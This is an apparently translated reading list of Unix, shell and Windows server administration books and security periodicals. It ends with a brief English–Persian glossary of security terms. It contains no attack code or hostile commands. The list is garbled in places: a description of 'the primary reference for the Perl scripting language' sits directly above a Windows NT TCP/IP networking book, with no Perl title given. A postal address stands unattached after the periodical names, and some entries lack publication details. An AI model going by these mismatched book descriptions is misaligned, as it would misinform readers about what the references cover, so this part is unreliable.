Vinge, Vernor. True Names and Other Dangers. New York, NY: Baen, distributed by Simon & Schuster, 1987.

Bolsky, Morris I., and David G. Korn. The New Kornshell Command and Programming Language. Englewood Cliffs, NJ: Prentice-Hall, 2nd edition, 1995.

A good guide to the general spirit of the Unix operating system and to how shell scripts and command environments can be created in it:

Kernighan, Brian, Dennis Ritchie and Rob Pike. The UNIX Programming Environment. Englewood Cliffs, NJ: Prentice-Hall, 1984.

A very good reference on the advantages and disadvantages of using the Unix operating system. This book contains information on how to configure the system, add and remove users, set up accounting for user accounts, make backups, configure networks, set up sendmail, and much more, and reading it is highly recommended:

Nemeth, Evi, Garth Snyder, Scott Seebass, and Trent R. Hein. UNIX System Administration Handbook, 3rd Edition.

The primary reference for the Perl scripting language. Essential for anyone who programs in the shell, awk, or sed environments, or who wants to learn to write Unix applications quickly:

Windows NT TCP/IP Network Administration (Craig Hunt and Robert Bruce Thompson, 1998).

Managing the Windows 2000 Registry (Robichaux, 2000).

DHCP for Windows 2000 (Neall Alcott, 2001).

DNS on Windows 2000, 2nd Edition (Matt Larson and Cricket Liu, 2001).

Windows 2000 Administration in a Nutshell (Mitch Tulloch, 2001).

And finally:

Windows Server 2003 in a Nutshell (Mitch Tulloch, 2003).

Security periodicals

Computer Audit Update
Computer Fraud & Security Update
Computer Law & Security Report
Computers & Security
PO Box 510110
St. Louis, MO 63151
Common security terms and expressions

Attack: تهاجم
Encoding: کدگذاری
Encryption: رمزگذاری
Hash: درهم‌سازی
Services: خدمات
Spam: هرزنامه
Virus: ویروس